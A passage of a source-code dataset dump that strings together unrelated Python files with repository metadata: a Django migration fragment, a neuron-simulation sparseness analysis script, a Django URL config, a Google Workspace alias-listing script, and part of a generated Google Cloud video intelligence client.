('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('city', models.CharField(max_length=30)),
('service_area', models.CharField(max_length=100)),
('local_address', models.CharField(max_length=200)),
('pin', models.PositiveIntegerField()),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.RenameField(
model_name='register_model',
old_name='email_confirmed',
new_name='email_verified',
),
migrations.RemoveField(
model_name='register_model',
name='verified',
),
migrations.AddField(
model_name='address',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user_model.register_model'),
),
]
|
[
"[email protected]"
] | |
ff1860a752422a1a417c8f5358354a2586516dea
|
116f74ac3759a589db909136ef0bf82954ae68de
|
/analysis_codes_v2/temp_calc_sparseness_v2.py
|
6353026d3a6bff966e50d40a8470b723608386ee
|
[
"MIT"
] |
permissive
|
zqwei/LIF_Vis_model
|
741ffbc1cdb95d65af5bf46f0bfadfad7b706afa
|
16f651ac827ba5f0feb40a0e619e600f1251d009
|
refs/heads/master
| 2021-03-27T14:46:12.609442 | 2018-10-19T03:42:05 | 2018-10-19T03:42:05 | 92,066,512 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 18,434 |
py
|
import numpy as np
import pandas as pd
import cPickle as pickle
import os
import scipy.io as sio
import matplotlib
import matplotlib.pyplot as plt
matplotlib.rcParams.update({'font.size': 20})
def calc_sprns_by_range_and_plot(r_data,inds_range,sp_flag):
rshape = np.shape(r_data)
print np.shape(r_data)
if sp_flag=='pop':
sp_ind = 0
elif sp_flag=='lt':
sp_ind = 1
else:
print 'Error: unknown sparseness flag'
n_frames = rshape[sp_ind]
rates_array = r_data[inds_range,:]
r_data_sq = rates_array**2
nr = (np.sum(rates_array,sp_ind)/n_frames)**2
dr = (np.sum(r_data_sq,sp_ind)/n_frames)
S = (1 - nr/dr)/(1-(1/n_frames))
S=S[~np.isnan(S)]
if sp_ind == 1:
plt.figure()
plt.hist(S)
plt.show()
else:
plt.figure()
plt.plot(S)
plt.show()
return S[~np.isnan(S)]
def evaluate_and_plot_sparseness_by_cell_type(sim_data,r_data,sp_flag):
ctype_list = ['Scnn1a','Rorb','Nr5a1','PV1','PV2','LIF_exc','LIF_inh','all_bp_exc','all_bp_inh']
ctr = 0
fig,ax_list = plt.subplots(3,3)
for ii in range(3):
for jj in range(3):
ax = ax_list[ii,jj]
if ctr<=len(ctype_list):
ctype_str = ctype_list[ctr]
#print sim_data['cells_file']
S = calc_sprns_by_cell_type(sim_data['cells_file'],r_data,ctype_str,sp_flag)
# these are matplotlib.patch.Patch properties
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
if sp_flag=='lt':
mu=np.mean(S)
median = np.median(S)
sigma=np.std(S)
textstr = '$\mu=%.2f$\n$\mathrm{median}=%.2f$\n$\sigma=%.2f$'%(mu, median, sigma)
#ax.hist(S)
spr_hist, bins = np.histogram(S, bins=np.linspace(0, 1.0, 10))
ax.plot(bins[:-1], spr_hist)
ax.set_ylim((0, 8000.0))
# place a text box in upper left in axes coords
ax.text(0.25, 0.95, textstr, transform=ax.transAxes, fontsize=14,
verticalalignment='top', bbox=props)
ax.set_title(ctype_str)
ctr = ctr+1
elif sp_flag=='pop':
mu=np.mean(S)
median = np.median(S)
sigma=np.std(S)
textstr = '$\mu=%.5f$\n$\mathrm{median}=%.5f$\n$\sigma=%.5f$'%(mu, median, sigma)
ax.plot(S)
ax.set_ylim([0.7,1])
# place a text box in upper left in axes coords
ax.text(0.25, 0.95, textstr, transform=ax.transAxes, fontsize=14,
verticalalignment='top', bbox=props)
ax.set_title(ctype_str)
ctr = ctr+1
else:
print 'Error: unknown sparseness flag'
mng = plt.get_current_fig_manager()
mng.window.showMaximized()
plt.savefig(sim_data['f_out_spr_hist_eps'], format='eps')
plt.show()
def calc_sprns_by_cell_type(cells_file,r_data,ctype_str,sp_flag):
cells_db = pd.read_csv(cells_file, sep=' ')
rshape = np.shape(r_data)
if sp_flag=='pop':
sp_ind = 0
elif sp_flag=='lt':
sp_ind = 1
else:
print 'Error: unknown sparseness flag'
if ctype_str=='all_bp_exc':
#ct_inds = []
ct_inds_1 = np.array(np.where(cells_db['type']=='Scnn1a'))
ct_inds_2 = np.array(np.where(cells_db['type']=='Rorb'))
ct_inds_3 = np.array(np.where(cells_db['type']=='Nr5a1'))
ct_inds = np.concatenate((ct_inds_1[0],ct_inds_2[0],ct_inds_3[0]))
elif ctype_str =='all_bp_inh':
ct_inds_1 = np.array(np.where(cells_db['type']=='PV1'))
ct_inds_2 = np.array(np.where(cells_db['type']=='PV2'))
ct_inds = np.concatenate((ct_inds_1[0],ct_inds_2[0]))
else:
ct_inds = np.array(np.where(cells_db['type']==ctype_str))
ct_inds = ct_inds[0]
#print ct_inds, ctype_str
rates_array = r_data[ct_inds]
n_frames = rshape[sp_ind]
r_data_sq = rates_array**2
nr = (np.sum(rates_array,sp_ind)/n_frames)**2
dr = (np.sum(r_data_sq,sp_ind)/n_frames)
S = (1 - nr/dr)/(1-(1/n_frames))
return S[~np.isnan(S)]
def compute_fr_array_mov(cells_file, spk_f_names, f_out_r, t_start, t_stop, bin_size,ntr):
cells_db = pd.read_csv(cells_file, sep=' ')
t_bins = np.arange(t_start, t_stop, bin_size)
r_data = np.zeros( (len(cells_db.index), t_bins[:-1].size) )
t = np.array([])
gids = np.array([])
for f_name in spk_f_names:
#f_name = spk_f_names
print 'Processing file %s.' % (f_name)
data = np.genfromtxt(f_name, delimiter=' ')
if (data.size == 0):
t_tmp = np.array([])
gids_tmp = np.array([])
elif (data.size == 2):
t_tmp = np.array([data[0]])
gids_tmp = np.array([data[1]])
else:
t_tmp = data[:, 0]
gids_tmp = data[:, 1]
t = np.concatenate( (t, t_tmp) )
gids = np.concatenate( (gids, gids_tmp) )
for k_t, t_bin in enumerate(t_bins[:-1]):
print 'Computing rates in bins; working on bin %d of %d.' % (k_t, t_bins[:-1].size)
ind = np.intersect1d( np.where(t >= t_bin), np.where(t < (t_bin + bin_size)) )
t_tmp = t[ind]
gids_tmp = gids[ind]
df = pd.DataFrame( {'gid': gids_tmp, 't': t_tmp} )
df_tmp = df.groupby('gid').count() * 1000.0 / bin_size/ntr # Time is in ms and rate is in Hz.
df_tmp.columns = ['rates']
for gid in df_tmp.index:
r_data[gid, k_t] = df_tmp['rates'].loc[gid]
np.save(f_out_r, r_data)
def compute_fr_array_gratings(cells_file, spk_f_names, f_out_r, t_start, t_stop, bin_size,ntr):
cells_db = pd.read_csv(cells_file, sep=' ')
t_bins = np.arange(t_start, t_stop, bin_size)
r_data = np.zeros( (len(cells_db.index), t_bins[:-1].size) )
t = np.array([])
gids = np.array([])
for f_name in spk_f_names:
#f_name = spk_f_names
print 'Processing file %s.' % (f_name)
data = np.genfromtxt(f_name, delimiter=' ')
if (data.size == 0):
t_tmp = np.array([])
gids_tmp = np.array([])
elif (data.size == 2):
t_tmp = np.array([data[0]])
gids_tmp = np.array([data[1]])
else:
t_tmp = data[:, 0]
gids_tmp = data[:, 1]
t = np.concatenate( (t, t_tmp) )
gids = np.concatenate( (gids, gids_tmp) )
for k_t, t_bin in enumerate(t_bins[:-1]):
print 'Computing rates in bins; working on bin %d of %d.' % (k_t, t_bins[:-1].size)
ind = np.intersect1d( np.where(t >= t_bin), np.where(t < (t_bin + bin_size)) )
t_tmp = t[ind]
gids_tmp = gids[ind]
df = pd.DataFrame( {'gid': gids_tmp, 't': t_tmp} )
df_tmp = df.groupby('gid').count() * 1000.0 / bin_size/ntr # Time is in ms and rate is in Hz.
df_tmp.columns = ['rates']
for gid in df_tmp.index:
r_data[gid, k_t] = df_tmp['rates'].loc[gid]
np.save(f_out_r, r_data)
def create_nat_movie_sim_dict(base_dir,sys_name):
st_frame_list = ['1530','3600','5550']
end_frame_list = ['1680','3750','5700']
sim_dict_list = {}
for kk in range(len(st_frame_list)):
st_frame = st_frame_list[kk]
end_frame = end_frame_list[kk]
f1_str = st_frame+'_to_'+end_frame+'_'
expt_str = sys_name+'_toe'+st_frame
# Decide which simulations we are doing analysis for.
sim_dict = {}
if sys_name=='ll2':
#f2 = '_sd278/spk.dat'
f2 = '_sdlif_z101/spk.dat'
elif sys_name=='rr2':
f2 = '_sd282_cn0/spk.dat'
sim_dict[expt_str] = {'cells_file': '../../../build/'+sys_name+'.csv',
't_start': 500.0,
't_stop': 5000.0,
'bin_size':33.3,
'N_trials':10,
#'f_1': base_dir+'simulations_'+sys_name+'/natural_movies/output_'+sys_name+'_TouchOfEvil_frames_'+f1_str,
'f_1': base_dir+'simulation_'+sys_name+'/output_'+sys_name+'_TouchOfEvil_frames_'+f1_str,
'f_2': f2,
'f_out_r': 'LIF' + expt_str+'_r.npy',
'f_out_spr_hist_eps': 'LIF' + expt_str + 'spr_hist.eps'}
sim_dict_list[kk] = sim_dict
return sim_dict_list
def create_grating_sim_dict(base_dir,sys_name):
gc_list = ['8','38','68']
sim_dict_list = {}
for kk in range(len(gc_list)):
f1_str = gc_list[kk]
expt_str = sys_name+'grating_g'+f1_str
# Decide which simulations we are doing analysis for.
sim_dict = {}
if sys_name=='ll2':
#f2 = '_sd278/spk.dat'
f2 = '_sdlif_z101/spk.dat'
elif sys_name=='rr2':
f2 = '_sd282_cn0/spk.dat'
sim_dict[expt_str] = {'cells_file': '../../../build/'+sys_name+'.csv',
't_start': 500.0,
't_stop': 3000.0,
'bin_size':33.3,
'N_trials':10,
# 'f_1': base_dir+'simulations_'+sys_name+'/gratings/output_'+sys_name+'_g'+f1_str+'_',
'f_1': base_dir+'simulation_'+sys_name+'/output_'+sys_name+'_g'+f1_str+'_',
'f_2': f2,
'f_out_r': 'LIF' + expt_str + '_r_v2.npy',
'f_out_spr_hist_eps': 'LIF' + expt_str + 'spr_hist.eps'}
sim_dict_list[kk] = sim_dict
return sim_dict_list
def sparseness_main(input_dict,sprns_type, plot_only_flag):
for kk in range(len(input_dict)):
sim_dict = input_dict[kk]
for sim_key in sim_dict.keys():
sim_data = sim_dict[sim_key]
if plot_only_flag!=1:
spk_f_names = []
for i in xrange(sim_data['N_trials']):
spk_f_names.append('%s%d%s' % (sim_data['f_1'], i, sim_data['f_2']))
compute_fr_array_mov(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
#compute_fr_array_imgs(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
#compute_fr_array_gratings(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
print sim_data['f_out_r']
r_data = np.load(sim_data['f_out_r'])
evaluate_and_plot_sparseness_by_cell_type(sim_data,r_data,sprns_type)
#calc_sprns_by_range_and_plot(r_data,np.arange(0,8500,1),'lt')
if __name__ == '__main__':
#base_dir = '/data/mat/antona/network/14-simulations/9-network/'
#sys_list = ['ll2','rr2']
base_dir = '/data/mat/ZiqiangW/simulation_ll_final_syn_data_lif_z102/'
sys_list = ['ll2']
plot_only_flag = 1 #0
for ss in range(len(sys_list)):
sys_name=sys_list[ss]
nat_sim_dict = create_nat_movie_sim_dict(base_dir,sys_name)
sparseness_main(nat_sim_dict,'lt',plot_only_flag)
#grating_sim_dict = create_grating_sim_dict(base_dir,sys_name)
#sparseness_main(grating_sim_dict,'lt',plot_only_flag)
#####======================LEGACY CODE=====================================#################
# def compute_fr_array_imgs(cells_file,spk_f_names,f_out_r,t_start,t_stop,bin_size,ntr):
# cells = pd.read_csv(cells_file, sep=' ')
# #num_cells = 8500
# #cells = cells1[cells1.index<num_cells]
# N_cells = len(cells.index)
#
# pkl_path = '/data/mat/antona/network/14-simulations/6-LGN_firing_rates_and_spikes/LGN_spike_trains/output2/imseq_metadata.pkl'
# f = open(pkl_path,'rb')
# imseq = pickle.load(f)
# f.close()
#
# img_ids = imseq[0]
# img_ids.insert(0,'gray')
# all_df = np.empty((N_cells,len(img_ids),ntr),dtype=object)
#
# for i_trial in np.arange(1,ntr):#,f_name in enumerate(spk_f_names):
# f_name = spk_f_names[i_trial]
# print i_trial
# print 'Processing file %s' % (f_name)
# if (os.stat(f_name).st_size != 0):
# df_temp = pd.read_csv(f_name, header=None, sep=' ')
# df_temp.columns = ['t', 'gid']
# df= df_temp#[df_temp['gid']<num_cells]
#
# i_trial_imseq = imseq[i_trial]
# i_trial_imseq.insert(0,'gray')
# #print i_trial
# #print i_trial_imseq
# for ctr, img in enumerate(i_trial_imseq):
# imcol = img_ids.index(img)
# if (ctr == 0 and img == 'gray'):
# df1 = df[df['t']<t_start]
# df1['time_img_on'] = 0.
# df1['img_id'] = img
# else:
# df1 = df[(df['t']>=(t_start+(ctr-1)*bin_size)) & (df['t']<(t_start+(ctr)*bin_size))]
# df1['time_img_on'] = t_start+(ctr-1)*bin_size
# df1['img_id'] = img
#
# if not df1.empty:
# df2 = df1.groupby('gid')
# for cnum,group in df2:
# all_df[cnum,imcol,i_trial] = group['t'].values - group['time_img_on'].values
#
#
# r_data = np.zeros((N_cells,len(img_ids)))
# for cid in range(N_cells):
# for imid in range(len(img_ids)):
# for tr in np.arange(1,ntr):
# if all_df[cid,imid,tr] is not None:
# r_data[cid,imid]= r_data[cid,imid]+len(all_df[cid,imid,tr])*1000./bin_size/ntr
#
# #np.save(f_out_r, r_data)
#
# temp2 = np.zeros((N_cells,len(img_ids),ntr))
# for cid in range(N_cells):
# for imid in range(len(img_ids)):
# for tr in np.arange(1,ntr):
# if all_df[cid,imid,tr] is not None:
# temp2[cid,imid,tr]= len(all_df[cid,imid,tr])
# flag_orig = 0
#
# if flag_orig == 1:
# ## Original computation with binning after re-ordering nat_img sequences
# ##======================================================================
# temp1 = sio.loadmat('temp_spt_per_trial_for_exc_biophys_rr2.mat')
# spkcts_ll = temp1['spikecounts_per_cell_img']
# spkcts_per_trial_ll = temp1['spikecounts_per_cell_img_trial']
#
# temp = spkcts_ll[:,1:11]*1000./250./100.
# n1 = (np.sum(temp,1)/10.)**2
#
# temp2 = temp**2
# d1 =(np.sum(temp2,1)/10.)
#
# S = (1 - n1/d1)/(1-(1/10))
# plt.figure()
# plt.hist(S[~np.isnan(S)])
# plt.show()
# else:
# ## Start using Anton's code:
# ##===========================
#
# base_dir = '/data/mat/antona/network/14-simulations/9-network/'
# sys_name='ll2'
# # st_frame = '5550'
# # end_frame = '5700'
# # f1_str = st_frame+'_to_'+end_frame+'_'
# # expt_str = sys_name+'_toe'+st_frame
# # expt_str = sys_name+'_nat_imgs'
# expt_str = sys_name+'_nat_imgs'
#
# # Decide which simulations we are doing analysis for.
# sim_dict = {}
#
# sim_dict[expt_str] = { 'cells_file': base_dir+'build/'+sys_name+'.csv',
# 't_start': 500.0,
# 't_stop': 5000.0,
# 'bin_size':33.3,
# 'N_trials':10,
# 'f_1': base_dir+'simulations_'+sys_name+'/natural_movies/output_'+sys_name+'_TouchOfEvil_frames_'+f1_str,
# 'f_2': '_sd278/spk.dat',
# 'f_out_r': expt_str+'_r.npy',
# 'f_out_av': 'sparseness/'+expt_str+'_av.csv' }
#
# # sim_dict[expt_str] = { 'cells_file': base_dir+'build/'+sys_name+'.csv',
# # 't_start': 500.0,
# # 't_stop': 3250.0,
# # 'bin_size':250.,
# # 'N_trials':100,
# # 'f_1': base_dir+'simulations_'+sys_name+'/natural_images/output_'+sys_name+'_imseq_',
# # 'f_2': '_0_sd282_cn0/spk.dat',
# # 'f_out_r': expt_str+'_r_Aug6_2016.npy',
# # 'f_out_av': expt_str+'_av.csv' }
#
# # Process the data and obtain arrays of responses for each neuron within each time bin, averaged over trials.
# for sim_key in sim_dict.keys():
# sim_data = sim_dict[sim_key]
# spk_f_names = []
# for i in xrange(sim_data['N_trials']):
# spk_f_names.append('%s%d%s' % (sim_data['f_1'], i, sim_data['f_2']))
# compute_fr_array_mov(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
# compute_fr_array_imgs(sim_data['cells_file'], spk_f_names, sim_data['f_out_r'], sim_data['t_start'], sim_data['t_stop'], sim_data['bin_size'],sim_data['N_trials'])
#
# print sim_data['f_out_r']
# r_data = np.load(sim_data['f_out_r'])
# r_data = r_data[:,1:]
# evaluate_and_plot_sparseness_by_cell_type(r_data,'pop')
# #calc_sprns_by_range_and_plot(r_data,np.arange(0,8500,1),'lt')
#
|
[
"[email protected]"
] | |
c701a8e3e3a9cf17b6caf71b1a833ea08ac13ec6
|
12cf1b968423f8148db853b89d869a7b44f52d3d
|
/time_display_project/urls.py
|
fb0851719ba1ce88c7ad6bdc2513637a2cb2e3c6
|
[] |
no_license
|
raqueloropeza/CodingDojo_Django_TimeDisplay
|
6cae35abcb512c222c0552992fd58d5742f75923
|
eb9c169e3352d946ddb7c728a1ee024e41ef14ad
|
refs/heads/master
| 2023-05-26T02:04:20.107681 | 2021-05-31T02:42:29 | 2021-05-31T02:42:29 | 372,362,246 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 750 |
py
|
"""time_display_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, include
urlpatterns = [
path('', include('app_time_display.urls')),
]
|
[
"[email protected]"
] | |
19262e47b10b332431050c327993066170f36ffe
|
763ca657487d349e57fb2e2753c9ee6d930043e8
|
/djusagi/bin/aliases.py
|
63d8d9092ccc59747a22d73e664755a6b871cf15
|
[
"MIT"
] |
permissive
|
carthage-college/django-djusagi
|
b680728ab292ab427e9b95fbb8f8a8de232a6809
|
ff890b270a9d21b9130068d69df680e5cf5e04ee
|
refs/heads/master
| 2023-04-07T09:13:08.719663 | 2023-03-28T14:08:43 | 2023-03-28T14:08:43 | 41,050,821 | 0 | 0 |
MIT
| 2023-03-13T21:42:05 | 2015-08-19T17:57:56 |
Python
|
UTF-8
|
Python
| false | false | 2,244 |
py
|
# -*- coding: utf-8 -*-
import sys
# env
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/')
from django.conf import settings
from djusagi.core.utils import get_cred
from googleapiclient.discovery import build
import argparse
import httplib2
"""
Fetch all users from the Google API for a given domain
and check for aliases
"""
# set up command-line options
desc = """
Obtain all aliases from all users in the domain
"""
EMAIL = settings.DOMAIN_SUPER_USER_EMAIL
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
"--test",
action='store_true',
help="Dry run?",
dest="test"
)
def main():
"""
main function
"""
credentials = get_cred(EMAIL, "admin.directory.user")
http = httplib2.Http()
service = build(
"admin", "directory_v1", http=credentials.authorize(http)
)
user_list = []
page_token = None
while True:
results = service.users().list(
domain=EMAIL.split('@')[1],
maxResults=100,
pageToken=page_token,
orderBy='familyName', viewType='domain_public'
).execute(num_retries=10)
for r in results["users"]:
user_list.append(r)
page_token = results.get('nextPageToken')
if not page_token:
break
for user in user_list:
pmail = user.get('primaryEmail')
if pmail:
aliases = service.users().aliases().list(userKey=pmail).execute(
num_retries=10
)
if aliases and aliases.get('aliases'):
for alias in aliases.get('aliases'):
if alias.get('alias'):
print('{}|{}|{}|{}'.format(
user.get('name').get('familyName'),
user.get('name').get('givenName'),
user.get('primaryEmail'), alias.get('alias')
))
######################
# shell command line
######################
if __name__ == "__main__":
args = parser.parse_args()
test = args.test
if test:
print(args)
sys.exit(main())
|
[
"[email protected]"
] | |
fead5db3c50b8e60ef68293d4b6165eb4a5f9806
|
6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386
|
/google/cloud/videointelligence/v1p3beta1/videointelligence-v1p3beta1-py/google/cloud/videointelligence_v1p3beta1/services/streaming_video_intelligence_service/client.py
|
5801df7ba2beb8459ff6617c5eb39f8ae345ec5a
|
[
"Apache-2.0"
] |
permissive
|
oltoco/googleapis-gen
|
bf40cfad61b4217aca07068bd4922a86e3bbd2d5
|
00ca50bdde80906d6f62314ef4f7630b8cdb6e15
|
refs/heads/master
| 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 17,380 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Iterable, Iterator, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.videointelligence_v1p3beta1.types import video_intelligence
from google.rpc import status_pb2 # type: ignore
from .transports.base import StreamingVideoIntelligenceServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import StreamingVideoIntelligenceServiceGrpcTransport
from .transports.grpc_asyncio import StreamingVideoIntelligenceServiceGrpcAsyncIOTransport
class StreamingVideoIntelligenceServiceClientMeta(type):
"""Metaclass for the StreamingVideoIntelligenceService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[StreamingVideoIntelligenceServiceTransport]]
_transport_registry["grpc"] = StreamingVideoIntelligenceServiceGrpcTransport
_transport_registry["grpc_asyncio"] = StreamingVideoIntelligenceServiceGrpcAsyncIOTransport
def get_transport_class(cls,
label: str = None,
) -> Type[StreamingVideoIntelligenceServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class StreamingVideoIntelligenceServiceClient(metaclass=StreamingVideoIntelligenceServiceClientMeta):
"""Service that implements streaming Video Intelligence API."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "videointelligence.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
StreamingVideoIntelligenceServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
StreamingVideoIntelligenceServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> StreamingVideoIntelligenceServiceTransport:
"""Returns the transport used by the client instance.
Returns:
StreamingVideoIntelligenceServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(self, *,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, StreamingVideoIntelligenceServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the streaming video intelligence service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, StreamingVideoIntelligenceServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, StreamingVideoIntelligenceServiceTransport):
# transport is a StreamingVideoIntelligenceServiceTransport instance.
if credentials or client_options.credentials_file:
raise ValueError("When providing a transport instance, "
"provide its credentials directly.")
if client_options.scopes:
